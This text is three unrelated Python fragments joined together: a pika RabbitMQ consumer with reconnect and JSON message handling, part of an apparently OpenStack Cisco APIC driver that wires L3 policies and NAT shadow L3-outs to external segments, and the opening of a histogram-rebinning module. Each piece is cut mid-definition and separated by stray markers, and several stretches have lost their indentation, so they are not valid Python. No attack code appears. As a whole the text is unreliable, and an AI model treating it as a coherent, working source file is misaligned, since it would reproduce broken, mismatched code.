:param str routing_key: Optional routing key of binding to create between exchange and queue
"""
self._connection = None
""":type: pika.SelectConnection"""
self._channel = None
self._consumer_tag = None
self._closing = False
self._handler = handler
self._queue = queue
self._url = amqp_url
if ((exchange or exchange_type or routing_key)
and not (exchange and exchange_type and routing_key)):
raise RuntimeError("Either provide all of exchange, exchange_type, and routing_key, "
"or provide none of them to not declare and bind an exchange")
self._exchange = exchange
self._exchange_type = exchange_type
self._routing_key = routing_key
def connect(self):
    """Open a pika SelectConnection to RabbitMQ and return it.

    pika invokes on_connection_open once the connection is established.

    :rtype: pika.SelectConnection
    """
    logger.debug('Connecting to %s', self._url)
    parameters = pika.URLParameters(self._url)
    return pika.SelectConnection(parameters=parameters,
                                 on_open_callback=self.on_connection_open)
def on_connection_open(self, _):
    """Called by pika once the connection to RabbitMQ has been established.

    Registers the connection-close callback before opening the channel so
    an early disconnect is still noticed. The connection handle argument
    is unused (we keep it in self._connection from connect()).

    :type _: pika.SelectConnection
    """
    logger.debug('Connection opened')
    self.add_on_connection_close_callback()
    self.open_channel()
def add_on_connection_close_callback(self):
    """Register on_connection_closed to be invoked by pika when RabbitMQ
    closes the connection to the consumer unexpectedly.
    """
    logger.debug('Adding connection close callback')
    self._connection.add_on_close_callback(callback=self.on_connection_closed)
def on_connection_closed(self, _, error):
"""Called by pika when the connection to RabbitMQ is closed
unexpectedly.
Since it is unexpected, we will reconnect to RabbitMQ if it disconnects.
:param pika.connection.Connection _: The closed connection object
:param Exception | None error: The Exception containing the reason the connection was closed
"""
self._channel = None
if self._closing:
self._connection.ioloop.stop()
else:
logger.warning('Connection closed, reopening in 5 seconds: {}'.format(error))
self._connection.ioloop.call_later(delay=5, callback=self.reconnect)
def reconnect(self):
    """Will be invoked by the IOLoop timer if the connection is closed.

    See the on_connection_closed method. Stops the old connection's ioloop
    and, unless a shutdown is in progress, opens a fresh connection and
    starts its new ioloop.
    """
    # This is the old connection IOLoop instance, stop its ioloop
    self._connection.ioloop.stop()
    if not self._closing:
        # Create a new connection
        self._connection = self.connect()
        # There is now a new connection, needs a new ioloop to run
        self._connection.ioloop.start()
def on_channel_open(self, channel):
    """Called by pika when the channel has been opened.

    Stores the channel, registers its close callback, and continues the
    setup chain with the QoS configuration.

    :param pika.channel.Channel channel: The channel object
    """
    logger.debug('Channel opened')
    self._channel = channel
    self.add_on_channel_close_callback()
    self.setup_qos()
def setup_qos(self):
    """Configure QoS to prefetch only one unacknowledged message at a time;
    on_qos_set continues the setup chain once applied."""
    self._channel.basic_qos(prefetch_count=1, callback=self.on_qos_set)
def on_qos_set(self, _):
"""Will be invoked when the QoS is configured"""
if self._exchange:
self.setup_exchange()
else:
self.setup_queue()
def setup_exchange(self):
    """Declare the (durable) exchange.

    When completed, the on_exchange_declareok method will be invoked by pika.
    """
    logger.debug('Declaring exchange %s', self._exchange)
    self._channel.exchange_declare(exchange=self._exchange,
                                   exchange_type=self._exchange_type,
                                   callback=self.on_exchange_declareok,
                                   durable=True)
def on_exchange_declareok(self, _):
    """Invoked by pika when the exchange is declared; declares the queue next.

    :param pika.frame.Method _: Exchange.DeclareOk response frame
    """
    logger.debug("Exchange declared")
    self.setup_queue()
def setup_queue(self):
    """Declare the (durable) queue.

    When completed, the on_queue_declareok method will be invoked by pika.
    """
    # Lazy %-args (was eager %-interpolation) per logging best practice:
    # the string is only built if DEBUG is actually emitted.
    logger.debug("Declaring queue %s", self._queue)
    self._channel.queue_declare(queue=self._queue, callback=self.on_queue_declareok, durable=True)
def on_queue_declareok(self, _):
"""Invoked by pika when queue is declared
This method will start consuming or first bind the queue to the exchange
if an exchange is provided.
After binding, the on_bindok method will be invoked by pika.
:param pika.frame.Method _: The Queue.DeclareOk frame
"""
logger.debug("Binding %s to %s with %s", self._exchange, self._queue, self._routing_key)
if self._exchange:
self._channel.queue_bind(queue=self._queue, exchange=self._exchange, routing_key=self._routing_key,
callback=self.on_bindok)
else:
self.start_consuming()
def on_bindok(self, _):
    """Invoked by pika after the queue is bound to the exchange; starts consuming.

    :param pika.frame.Method _: The Queue.BindOk frame
    """
    logger.debug("Queue bound")
    self.start_consuming()
def add_on_channel_close_callback(self):
    """Register on_channel_closed to be invoked by pika if RabbitMQ
    unexpectedly closes the channel.
    """
    logger.debug('Adding channel close callback')
    self._channel.add_on_close_callback(callback=self.on_channel_closed)
def on_channel_closed(self, channel, closing_reason):
    """Called by pika when RabbitMQ unexpectedly closes the channel.

    Channels are usually closed on a protocol violation (e.g. re-declaring
    an exchange or queue with different parameters), so close the whole
    connection to shut the consumer down.

    :param pika.channel.Channel channel: The closed channel
    :param Exception | None closing_reason: The Exception containing the reason the channel was closed
    """
    # Lazy %-style logging args (was eager str.format).
    logger.warning('Channel %s was closed: %s', channel, closing_reason)
    if not self._connection.is_closing and not self._connection.is_closed:
        self._connection.close()
def start_consuming(self):
    """Begin consuming messages from the queue.

    Registers the cancel callback first so the object is notified if
    RabbitMQ cancels the consumer, then issues Basic.Consume. The returned
    consumer tag is kept so consuming can be cancelled later; on_message
    is invoked by pika for every fully received message.
    """
    self.add_on_cancel_callback()
    self._consumer_tag = self._channel.basic_consume(queue=self._queue, on_message_callback=self.on_message)
    logger.info('Listening')
def add_on_cancel_callback(self):
    """Register on_consumer_cancelled to be invoked by pika if RabbitMQ
    cancels this consumer for some reason.
    """
    logger.debug('Adding consumer cancellation callback')
    self._channel.add_on_cancel_callback(callback=self.on_consumer_cancelled)
def on_consumer_cancelled(self, method_frame):
    """Invoked by pika when RabbitMQ sends a Basic.Cancel for this consumer.

    Closes the channel (if still open), which in turn tears the
    connection down via on_channel_closed.

    :param pika.frame.Method method_frame: The Basic.Cancel frame
    """
    logger.debug('Consumer was cancelled remotely, shutting down: %r', method_frame)
    channel = self._channel
    if channel:
        channel.close()
def on_message(self, _, basic_deliver, properties, body):
    """Invoked by pika when a message is delivered from RabbitMQ.

    The body is decoded as UTF-8 and json-parsed; on success the handler
    is called and the delivery is acknowledged. Messages that are not
    valid UTF-8 JSON are discarded (and not acknowledged here).

    :type _: pika.channel.Channel
    :type basic_deliver: pika.Spec.Basic.Deliver
    :type properties: pika.Spec.BasicProperties
    :type body: str|unicode
    """
    logger.debug('Received message # %s from %s: %s', basic_deliver.delivery_tag, properties.app_id, body)
    try:
        # Bugfix: the codec name was '-utf-8', which raises LookupError
        # (not caught below) on every message; 'utf-8' is the correct name.
        # UnicodeDecodeError is a ValueError subclass, so undecodable
        # bodies are discarded by the same except clause as invalid JSON.
        decoded = json.loads(body.decode('utf-8'))
    except ValueError:
        logger.warning('Discarding message containing invalid json: %s', body)
    else:
        self._handler(decoded)
        self.acknowledge_message(basic_deliver.delivery_tag)
def acknowledge_message(self, delivery_tag):
    """Acknowledge the message delivery from RabbitMQ.

    :param int delivery_tag: The delivery tag from the Basic.Deliver frame
    """
    logger.debug('Acknowledging message %s', delivery_tag)
    self._channel.basic_ack(delivery_tag=delivery_tag)
def open_channel(self):
    """Open a new channel with RabbitMQ.

    When RabbitMQ responds that the channel is open, the on_channel_open
    callback will be invoked by pika.
    """
    logger.debug('Creating new channel')
    self._connection.channel(on_open_callback=self.on_channel_open)
def run(self):
"""Start the consumer by connecting to RabbitMQ and then starting | |
doesn't allow tDn being present
if self._trim_tDn_from_dict(req_dict, 'tnFvCtxName'):
req_dict['tnFvCtxName'] = l3p_name
# this is for l3extRsNdIfPol case
self._trim_tDn_from_dict(req_dict, 'tnNdIfPolName')
# this is for l3extRsDampeningPol/l3extRsInterleakPol case
self._trim_tDn_from_dict(req_dict, 'tnRtctrlProfileName')
# this is for ospfRsIfPol case
self._trim_tDn_from_dict(req_dict, 'tnOspfIfPolName')
# this is for l3extRs[I|E]ngressQosDppPol case
self._trim_tDn_from_dict(req_dict, 'tnQosDppPolName')
# this is for bfdRsIfPol case
self._trim_tDn_from_dict(req_dict, 'tnBfdIfPolName')
# this is for bgpRsPeerPfxPol case
self._trim_tDn_from_dict(req_dict, 'tnBgpPeerPfxPolName')
# this is for eigrpRsIfPol case
self._trim_tDn_from_dict(req_dict, 'tnEigrpIfPolName')
for value in req_dict.values():
if isinstance(value, dict):
self._trim_keys_from_dict(value, keys, encap, l3p_name)
elif isinstance(value, list):
for element in value:
if isinstance(element, dict):
self._trim_keys_from_dict(element, keys,
encap, l3p_name)
return req_dict
def _clone_l3out(self, context, es, es_name, es_tenant, encap):
    """Clone a pre-existing APIC L3-out under a new name/tenant.

    Fetches the full pre-existing l3extOut tree from APIC, strips the
    children/attributes APIC rejects on create (via _trim_keys_from_dict,
    which also rewrites encap and the VRF reference), rewrites the tenant
    and l3out RNs in the serialized request, and POSTs the result.
    """
    pre_es_name = self.name_mapper.name_mapper.pre_existing(
        context, es['name'])
    l3out_info = self._query_l3out_info(pre_es_name,
                                        self.name_mapper.tenant(es),
                                        return_full=True)
    old_tenant = self.apic_manager.apic.fvTenant.rn(
        l3out_info['l3out_tenant'])
    new_tenant = self.apic_manager.apic.fvTenant.rn(es_tenant)
    old_l3_out = self.apic_manager.apic.l3extOut.rn(pre_es_name)
    new_l3_out = self.apic_manager.apic.l3extOut.rn(es_name)
    request = {}
    request['children'] = l3out_info['l3out']
    request['attributes'] = {"rn": new_l3_out}
    # trim the request: read-only / APIC-managed attributes and children
    # that must not appear in a create request.
    keys = (['l3extInstP', 'l3extRtBDToOut',
             'l3extExtEncapAllocator',
             'l3extRsOutToBDPublicSubnetHolder', 'modTs',
             'uid', 'lcOwn', 'monPolDn', 'forceResolve',
             'rType', 'state', 'stateQual', 'tCl', 'tType',
             'type', 'tContextDn', 'tRn', 'tag', 'name',
             'configIssues'])
    vrf = self.apic_manager.apic.fvCtx.name(
        context.current.get('name'))
    request = self._trim_keys_from_dict(request, keys, encap, vrf)
    final_req = {}
    final_req['l3extOut'] = request
    request_json = jsonutils.dumps(final_req)
    # Rename tenant/l3out RNs directly in the serialized JSON.
    if old_tenant != new_tenant:
        request_json = re.sub(old_tenant, new_tenant,
                              request_json)
    request_json = re.sub(old_l3_out, new_l3_out, request_json)
    # NOTE(review): strips empty-dict artifacts ("{},") left behind by the
    # trimming step; a plain-text regex on JSON -- confirm it cannot match
    # inside string values.
    request_json = re.sub('{},*', '', request_json)
    self.apic_manager.apic.post_body(
        self.apic_manager.apic.l3extOut.mo,
        request_json,
        es_tenant,
        str(es_name))
def _plug_l3p_to_es(self, context, es, is_shadow=False):
    """Attach an L3 policy to an external segment on APIC.

    Creates the L3-out (or clones a pre-existing one in the shadow
    edge-NAT case), optionally fleshes out the logical node profile and
    static routes, and wires the relevant BDs / NAT artifacts. When NAT
    is enabled the method recurses once with is_shadow=True to build the
    per-tenant shadow L3-out, then re-plugs the external policies.
    """
    # With NAT enabled (and not a shadow call) the L3-out is attached to
    # the NAT VRF instead of the policy's own VRF.
    l3_policy = (self.name_mapper.l3_policy(context, context.current)
                 if (not self._is_nat_enabled_on_es(es) or is_shadow) else
                 self._get_nat_vrf_for_es(context, es))
    external_segments = context.current['external_segments']
    ext_info = self.apic_manager.ext_net_dict.get(es['name'])
    if not ext_info:
        LOG.warning(UNMANAGED_SEGMENT % es['id'])
        return
    exposed = ext_info.get('cidr_exposed')
    # Set the external fixed-ip for L3P for the non-shadow call
    if not is_shadow:
        # Address precedence: explicit segment IP, then assigned router
        # IP, then the host part of cidr_exposed from the config file.
        ip = external_segments[es['id']]
        if ip and ip[0]:
            ip = ip[0]
        else:
            ip = getattr(context, 'assigned_router_ips', {}).get(
                es['id'], [])
            if ip and ip[0]:
                ip = ip[0]
            else:
                ip = ext_info.get('cidr_exposed', '/').split('/')[0]
        if not ip:
            raise NoAddressConfiguredOnExternalSegment(
                l3p_id=context.current['id'], es_id=es['id'])
        context.set_external_fixed_ips(es['id'], [ip])
    is_edge_nat = self._is_edge_nat(ext_info)
    es_name = self.name_mapper.external_segment(
        context, es,
        prefix=self._get_shadow_prefix(context, is_shadow,
                                       context.current, is_edge_nat))
    es_name_pre = self.name_mapper.name_mapper.pre_existing(
        context._plugin_context, es['name'])
    es_tenant = self._get_tenant_for_shadow(is_shadow, context.current, es)
    nat_enabled = self._is_nat_enabled_on_es(es)
    pre_existing = False if is_shadow else self._is_pre_existing(es)
    with self.apic_manager.apic.transaction() as trs:
        # Create External Routed Network connected to the proper
        # L3 Context
        is_l3out_creation_needed = not pre_existing
        # don't need to explicitly create the shadow l3out in this case
        # because we are going to query APIC then use the pre-existing
        # l3out as a template then clone it accordingly
        if (is_shadow and is_edge_nat and self._is_pre_existing(es)):
            is_l3out_creation_needed = False
        if is_l3out_creation_needed:
            self.apic_manager.ensure_external_routed_network_created(
                es_name, owner=es_tenant, context=l3_policy,
                transaction=trs)
        # Associate pre-existing, no-NAT L3-out with L3policy
        if pre_existing and not nat_enabled:
            l3out_info = self._query_l3out_info(
                es_name_pre, self.name_mapper.tenant(es))
            if l3out_info:
                mapped_tenant = l3out_info['l3out_tenant']
                self.apic_manager.set_context_for_external_routed_network(
                    mapped_tenant, es_name_pre, l3_policy, transaction=trs)
        is_details_needed = False
        if not is_shadow and not pre_existing:
            encap = ext_info.get('encap')  # No encap if None
            is_details_needed = True
        # if its edge nat then we have to flesh
        # out this shadow L3 out in APIC
        if is_shadow and is_edge_nat:
            vlan_id = self.l3out_vlan_alloc.reserve_vlan(
                es['name'], context.current['id'])
            encap = 'vlan-' + str(vlan_id)
            is_details_needed = True
        if is_details_needed:
            if self._is_pre_existing(es):
                self._clone_l3out(context, es, es_name, es_tenant, encap)
            else:
                # Build the logical node profile and static routes from
                # the per-segment config in ext_net_dict.
                switch = ext_info['switch']
                module, sport = ext_info['port'].split('/')
                router_id = ext_info['router_id']
                default_gateway = ext_info['gateway_ip']
                self.apic_manager.set_domain_for_external_routed_network(
                    es_name, owner=es_tenant, transaction=trs)
                self.apic_manager.ensure_logical_node_profile_created(
                    es_name, switch, module, sport, encap,
                    exposed, owner=es_tenant,
                    router_id=router_id, transaction=trs)
                for route in es['external_routes']:
                    self.apic_manager.ensure_static_route_created(
                        es_name, switch,
                        route['nexthop'] or default_gateway,
                        owner=es_tenant,
                        subnet=route['destination'], transaction=trs)
        if is_shadow:
            # Shadow call: point the VRF's BDs at the shadow L3-out.
            l2ps = self._get_l2_policies(
                context._plugin_context,
                {'id': context.current['l2_policies']})
            for l2p in l2ps:
                self.apic_manager.set_l3out_for_bd(
                    self._tenant_by_sharing_policy(l2p),
                    self.name_mapper.l2_policy(context, l2p),
                    es_name)
        if nat_enabled:
            if not is_shadow:
                # set L3-out for NAT-BD
                self.apic_manager.set_l3out_for_bd(
                    es_tenant,
                    self._get_nat_bd_for_es(context, es),
                    (self.name_mapper.name_mapper.pre_existing(
                        context, es['name']) if pre_existing else es_name),
                    transaction=trs)
            elif not is_edge_nat:
                # create tenant-specific NAT EPG if required
                self._create_tenant_specific_nat_epg(
                    context, es, context.current, transaction=trs)
    if not is_shadow:
        if nat_enabled:
            # create shadow external-networks
            self._plug_l3p_to_es(context, es, True)
            # create shadow external EPGs indirectly by re-plugging
            # external policies to external segment
            eps = context._plugin.get_external_policies(
                context._plugin_context,
                filters={'id': es['external_policies'],
                         'tenant_id': [context.current['tenant_id']]})
            for ep in eps:
                self._plug_external_policy_to_segment(
                    context, ep,
                    [es['id']], ep['provided_policy_rule_sets'],
                    ep['consumed_policy_rule_sets'])
        else:
            # Associate BDs of the VRF to L3-out
            l2ps = self._get_l2_policies(
                context._plugin_context,
                {'id': context.current['l2_policies']})
            for l2p in l2ps:
                self.apic_manager.set_l3out_for_bd(
                    self._tenant_by_sharing_policy(l2p),
                    self.name_mapper.l2_policy(context, l2p),
                    es_name_pre if pre_existing else es_name)
def _unplug_l3p_from_es(self, context, es, is_shadow=False):
    """Detach an L3 policy from an external segment on APIC.

    Mirrors _plug_l3p_to_es: tears down the (shadow) L3-out, NAT EPGs,
    and BD associations; recurses once with is_shadow=True to remove the
    shadow artifacts before removing the real ones.
    """
    is_edge_nat = False
    if is_shadow:
        ext_info = self.apic_manager.ext_net_dict.get(es['name'])
        is_edge_nat = self._is_edge_nat(ext_info)
    es_name = self.name_mapper.external_segment(
        context, es,
        prefix=self._get_shadow_prefix(context, is_shadow,
                                       context.current, is_edge_nat))
    es_name_pre = self.name_mapper.name_mapper.pre_existing(
        context._plugin_context, es['name'])
    es_tenant = self._get_tenant_for_shadow(is_shadow, context.current, es)
    nat_enabled = self._is_nat_enabled_on_es(es)
    pre_existing = False if is_shadow else self._is_pre_existing(es)
    if not is_shadow:
        if nat_enabled:
            # remove shadow external-networks
            self._unplug_l3p_from_es(context, es, True)
            # NOTE(review): is_edge_nat is only computed when is_shadow,
            # so for this non-shadow call the check below is trivially
            # true -- confirm whether ext_info/is_edge_nat should also be
            # computed for the non-shadow path.
            if not is_edge_nat:
                # remove tenant-specific NAT EPG if required
                self._remove_tenant_specific_nat_epg(
                    context, es, context.current)
        else:
            # Dissociate BDs of the VRF from L3-out
            l2ps = self._get_l2_policies(
                context._plugin_context,
                {'id': context.current['l2_policies']})
            for l2p in l2ps:
                self.apic_manager.unset_l3out_for_bd(
                    self._tenant_by_sharing_policy(l2p),
                    self.name_mapper.l2_policy(context, l2p),
                    es_name_pre if pre_existing else es_name)
    set_ctx = self.apic_manager.set_context_for_external_routed_network
    # Delete the L3-out only when this was the last L3 policy using the
    # segment (shadow L3-outs are always per-policy and can go).
    if (is_shadow or
            not [x for x in es['l3_policies'] if x != context.current['id']]):
        with self.apic_manager.apic.transaction() as trs:
            if is_shadow or not pre_existing:
                self.apic_manager.delete_external_routed_network(
                    es_name, owner=es_tenant, transaction=trs)
            # Dissociate L3policy from pre-existing, no-NAT L3-out
            if pre_existing and not nat_enabled:
                l3out_info = self._query_l3out_info(
                    es_name_pre, self.name_mapper.tenant(es))
                if l3out_info:
                    mapped_tenant = l3out_info['l3out_tenant']
                    set_ctx(mapped_tenant, es_name_pre, None,
                            transaction=trs)
            if nat_enabled and not is_shadow:
                self.apic_manager.unset_l3out_for_bd(
                    es_tenant,
                    self._get_nat_bd_for_es(context, es),
                    (self.name_mapper.name_mapper.pre_existing(
                        context, es['name'])
                     if pre_existing else es_name),
                    transaction=trs)
    # if its edge nat then we have to release
    # the vlan associated with this shadow L3out
    if is_shadow and self._is_edge_nat(ext_info):
        self.l3out_vlan_alloc.release_vlan(
            es['name'], context.current['id'])
        l2ps = self._get_l2_policies(
            context._plugin_context,
            {'id': context.current['l2_policies']})
        for l2p in l2ps:
            self.apic_manager.unset_l3out_for_bd(
                self._tenant_by_sharing_policy(l2p),
                self.name_mapper.l2_policy(context, l2p),
                es_name)
def _build_routes_dict(self, routes):
result = {}
for route in routes:
if route['destination'] not in result:
result[route['destination']] = []
result[route['destination']].append(route['nexthop'])
return result
    def _plug_external_policy_to_segment(self, context, ep, segments,
                                         provided_prs, consumed_prs,
                                         l3policy_obj=None):
        """Create external EPGs (and their contracts) for external policy
        `ep` on each of the given external segments.

        When `l3policy_obj` is provided, this call creates the "shadow"
        artifacts scoped to that L3 policy (NAT case); otherwise it acts on
        the "real" external network and, when NAT is enabled, recurses once
        per associated L3 policy to build the shadow copies.
        """
        is_shadow = bool(l3policy_obj)
        if segments:
            added_ess = context._plugin.get_external_segments(
                context._plugin_context, filters={'id': segments})
            for es in added_ess:
                # Segments without an entry in the APIC config are not
                # managed by this driver; warn and skip.
                ext_info = self.apic_manager.ext_net_dict.get(es['name'])
                if not ext_info:
                    LOG.warning(UNMANAGED_SEGMENT % es['id'])
                    continue
                pfx = self._get_shadow_prefix(context, is_shadow, l3policy_obj,
                                              self._is_edge_nat(ext_info))
                ep_name = self.name_mapper.external_policy(context, ep,
                                                           prefix=pfx)
                # Pre-existing L3-outs are only relevant for the 'real'
                # (non-shadow) pass.
                pre_existing = (False if is_shadow else
                                self._is_pre_existing(es))
                pre_existing_epg = False
                nat_enabled = self._is_nat_enabled_on_es(es)
                if not pre_existing:
                    es_name = self.name_mapper.external_segment(context,
                                                                es, prefix=pfx)
                    es_tenant = self._get_tenant_for_shadow(is_shadow,
                                                            l3policy_obj, es)
                    if nat_enabled and not is_shadow:
                        ep_name = self.name_mapper.external_segment(context,
                                                                    es, prefix="default-")
                else:
                    # Resolve names and owning tenant of the pre-existing
                    # L3-out directly from APIC.
                    es_name = self.name_mapper.name_mapper.pre_existing(
                        context, es['name'])
                    l3out_info = self._query_l3out_info(es_name,
                        self.name_mapper.tenant(es))
                    if not l3out_info:
                        LOG.warning(PRE_EXISTING_SEGMENT % es['name'])
                        continue
                    es_tenant = l3out_info['l3out_tenant']
                    pre_existing_epg = (
                        ext_info.get('external_epg') == ep['name'])
                    if pre_existing_epg:
                        ep_name = self.name_mapper.name_mapper.pre_existing(
                            context, ep['name'])
                with self.apic_manager.apic.transaction() as trs:
                    # Create External EPG - with no route restrictions on the
                    # 'real' one and with proper destination routes
                    # in the shadow
                    if not pre_existing_epg:
                        subnets = set((x['destination'] for
                                       x in es['external_routes'])
                                      if (is_shadow or not nat_enabled)
                                      else ['0.0.0.0/0'])
                        for s in subnets:
                            self.apic_manager.ensure_external_epg_created(
                                es_name, subnet=s, external_epg=ep_name,
                                owner=es_tenant, transaction=trs)
                    if is_shadow or not nat_enabled:
                        # User-specified contracts are associated with
                        # shadow external EPGs (if NAT is enabled) or
                        # real external EPGs (if NAT is disabled)
                        self._manage_ep_policy_rule_sets(
                            context._plugin_context, es, ep,
                            provided_prs, consumed_prs, [], [],
                            l3policy_obj, transaction=trs)
                    if is_shadow:
                        if not self._is_edge_nat(ext_info):
                            nat_epg_tenant, nat_epg_name = (
                                self._determine_nat_epg_for_es(
                                    context, es, l3policy_obj))
                            # set up link to NAT EPG
                            (self.apic_manager.
                             associate_external_epg_to_nat_epg(
                                 es_tenant, es_name, ep_name,
                                 nat_epg_name, target_owner=nat_epg_tenant,
                                 transaction=trs))
                    elif nat_enabled:
                        # 'real' external EPGs provide and consume
                        # allow-all contract when NAT is enabled
                        nat_contract = self._get_nat_contract_for_es(
                            context, es)
                        self.apic_manager.set_contract_for_external_epg(
                            es_name, nat_contract,
                            external_epg=ep_name, owner=es_tenant,
                            provided=True, transaction=trs)
                        self.apic_manager.set_contract_for_external_epg(
                            es_name, nat_contract,
                            external_epg=ep_name, owner=es_tenant,
                            provided=False, transaction=trs)
                # create shadow external epgs in L3policies associated
                # with the segment
                if nat_enabled and not is_shadow:
                    l3ps = context._plugin.get_l3_policies(
                        context._plugin_context,
                        filters={'id': es['l3_policies'],
                                 'tenant_id': [ep['tenant_id']]})
                    for l3p in l3ps:
                        self._plug_external_policy_to_segment(context, ep,
                            [es['id']], provided_prs, consumed_prs,
                            l3policy_obj=l3p)
def _unplug_external_policy_from_segment(self, context, ep, segments,
l3policy_obj=None):
is_shadow = bool(l3policy_obj)
if segments:
added_ess = context._plugin.get_external_segments(
context._plugin_context, filters={'id': segments})
for es in added_ess:
ext_info = self.apic_manager.ext_net_dict.get(es['name'])
if not ext_info:
LOG.warning(UNMANAGED_SEGMENT % es['id'])
continue
pfx = self._get_shadow_prefix(context, is_shadow, l3policy_obj,
self._is_edge_nat(ext_info))
ep_name = self.name_mapper.external_policy(context, ep,
prefix=pfx)
pre_existing = (False if is_shadow else
self._is_pre_existing(es))
pre_existing_epg = False
nat_enabled = self._is_nat_enabled_on_es(es)
if nat_enabled and not is_shadow:
# remove the shadow external EPGs from L3policies
# associated with the segment
l3ps = context._plugin.get_l3_policies(
context._plugin_context,
filters={'id': es['l3_policies'],
'tenant_id': [ep['tenant_id']]})
for l3p in l3ps:
self._unplug_external_policy_from_segment(context, ep,
[es['id']], l3policy_obj=l3p)
if not pre_existing:
es_name = self.name_mapper.external_segment(context, es,
prefix=pfx)
es_tenant = self._get_tenant_for_shadow(is_shadow,
l3policy_obj, es)
if nat_enabled and not is_shadow:
ep_name = self.name_mapper.external_segment(context,
| |
<gh_stars>0
"""Functions for rebinning histogram-like distributions."""
# TODO: DVP: implement propagation in result the indexes computed on shrink
# for reuse in FMesh.shrink for equivalent grids or alike
from typing import Tuple
import collections.abc
import gc
import itertools
import platform
import numpy as np
from numpy import ndarray
if platform.system() == "Linux":
from mckit_meshes.utils.no_daemon_process import Pool
else:
Pool = None
# TODO
__all__ = [
"interpolate",
"is_monotonically_increasing",
"rebin_1d",
"rebin_nd",
"rebin_spec_composer",
"shrink_1d",
"shrink_nd",
"trim_spec_composer",
]
__revision__ = "$Id$"
__ZERO = np.array([0.0], dtype=float)
__EXTERNAL_PROCESS_THRESHOLD = 1000000
# noinspection PyTypeChecker
def is_monotonically_increasing(a: ndarray):
    """Return True when `a` is non-empty and strictly increasing."""
    if a.size == 0:
        return False
    # Vectorized pairwise test: every element must exceed its predecessor.
    # For a single-element array the comparison is empty and trivially holds.
    return bool(np.all(a[:-1] < a[1:]))
def set_axis(indices, axis, a_shape):
    """Reshape 1-D `indices` so it broadcasts along `axis` of an array of shape `a_shape`."""
    target = tuple(
        a_shape[axis] if dim == axis else 1 for dim in range(len(a_shape))
    )
    return indices.reshape(target)
def interpolate(x_new, x, y, axis=None):
    """Piecewise-linear interpolation of `y` (sampled at `x`) at points `x_new`.

    For 1-D `y` this is plain ``np.interp``; for n-D `y` the interpolation
    runs along `axis` (default 0) and broadcasts over the remaining axes.
    """
    if y.ndim == 1:
        return np.interp(x_new, x, y)
    if axis is None:
        axis = 0
    # Right-edge index of the interval containing each new point, clipped so
    # every point maps into a valid [x[lo], x[hi]] segment.
    hi = np.digitize(x_new, x).clip(1, len(x) - 1).astype(int)
    lo = hi - 1
    x_lo = x[lo]
    dx = x[hi] - x_lo
    # Select the lo/hi sample planes along the requested axis.
    lo_slicer = [slice(None)] * y.ndim
    hi_slicer = [slice(None)] * y.ndim
    lo_slicer[axis] = lo
    hi_slicer[axis] = hi
    y_lo = y[tuple(lo_slicer)]
    dy = y[tuple(hi_slicer)] - y_lo
    # Shape that broadcasts the 1-D per-point quantities along `axis`.
    bshape = [1] * y.ndim
    bshape[axis] = dy.shape[axis]
    bshape = tuple(bshape)
    slope = dy / dx.reshape(bshape)
    return slope * (x_new - x_lo).reshape(bshape) + y_lo
def rebin_1d(a, bins, new_bins, axis=0, grouped=False, assume_sorted=False):
    """Transforms 1-D histogram defined as `data` on the limiting points
    define like `bins` to equivalent (see the terms below) histogram defined
    on other limiting points defined as `new_bins`.
    Notes
    -----
    The algorithm maintains the equality of integral on intervals defined on
    new_bins for the original and rebinned distributions.
    Parameters
    ----------
    a: ndarray
        The array to rebin
    bins: ndarray
        Defines 1-D array representing `a` binning along the given `axis
    new_bins: ndarray
        The new binning required.
    axis: int, optional
        An axis along which to rebin array `a`
    grouped: bool, optional
        Defines the approach for rebinning.
        - If `True`, then the values in `a` represent the data already
          integrated over bins, like in energy group distributions.
          On rebinning maintain equivalence of integral over same
          energy range in old and new bins.
        - If `False` (default), as for spatial binning - maintain the same
          average value in the same volume in old and new bins.
    assume_sorted: bool, optional
        If True, then skip assertion of bins sorting order,
        by default False - asserts the input_file data
    Returns
    -------
    rebinned_data: ndarray
    """
    assert (
        bins[0] <= new_bins[0] and new_bins[-1] <= bins[-1]
    ), "Rebinning doesn't provide extrapolation out of the original bins"
    assert (
        bins.size == a.shape[axis] + 1
    ), "The `a` array shape doesn't match the given bins and axis"
    assert assume_sorted or is_monotonically_increasing(bins)
    assert assume_sorted or is_monotonically_increasing(new_bins)
    ndim = a.ndim
    if grouped:
        # Values are already per-bin integrals; use them directly.
        t = a
    else:
        # Convert bin-averaged values to per-bin integrals first
        # (multiply by bin widths, broadcast along `axis` for n-D input).
        diff = np.diff(bins)
        if ndim > 1:
            diffs_shape = [1] * ndim
            diffs_shape[axis] = a.shape[axis]
            diffs_shape = tuple(diffs_shape)
            diff = diff.reshape(diffs_shape)
        t = a * diff
    # Cumulative sum with a leading zero gives the running integral at every
    # original bin edge; linear interpolation evaluates that integral at the
    # new edges, and differencing recovers the per-new-bin integrals.
    cum = np.cumsum(t, axis=axis)
    cum = np.insert(cum, 0, __ZERO, axis=axis)
    rebinned_data = interpolate(new_bins, bins, cum, axis=axis)
    rebinned_data = np.diff(rebinned_data, axis=axis)
    # del cum
    if a.size > __EXTERNAL_PROCESS_THRESHOLD:
        # NOTE(review): forcing a GC cycle here presumably bounds peak memory
        # for very large arrays -- confirm this is still necessary.
        gc.collect()
        del gc.garbage[:]
    if not grouped:
        # Convert the integrals back to averages over the new bin widths.
        new_diff = np.diff(new_bins)
        if ndim > 1:
            diffs_shape = [1] * ndim
            diffs_shape[axis] = rebinned_data.shape[axis]
            new_diff = new_diff.reshape(tuple(diffs_shape))
        rebinned_data /= new_diff
    return rebinned_data
def rebin_nd(
    a,
    rebin_spec,
    assume_sorted=False,
    external_process_threshold=__EXTERNAL_PROCESS_THRESHOLD,
):
    """
    Rebin an array `a` over multidimensional grid.
    Parameters
    ----------
    a: ndarray
        A data to rebin.
    rebin_spec: Iterator
        An iterator listing tuples specifying bins, new_bins, axis and
        grouped parameters for rebinning.
        See :py:func:`rebin_1d` for details on the parameters.
    assume_sorted: bool, optional
        If True skip assertion of bins sorting order,
        by default False - asserts the input_file data
    external_process_threshold: int
        If size of `a` is greater than that, then the computation is executed in external process,
        to achieve immediate memory cleanup.
    Returns
    --------
    rebinned_data: ndarray
    """
    if not isinstance(rebin_spec, collections.abc.Iterator):
        rebin_spec = iter(rebin_spec)
    # Consume one (bins, new_bins, axis, grouped) tuple per recursion level;
    # an exhausted spec means nothing left to rebin.
    try:
        bins, new_bins, axis, grouped = next(rebin_spec)
    except StopIteration:
        return a
    if Pool is not None and a.size > external_process_threshold:
        # Delegate the remaining axes to a worker process so its memory is
        # reclaimed as soon as the process exits (Linux only).
        # NOTE(review): the Pool instance is never closed/joined here, and the
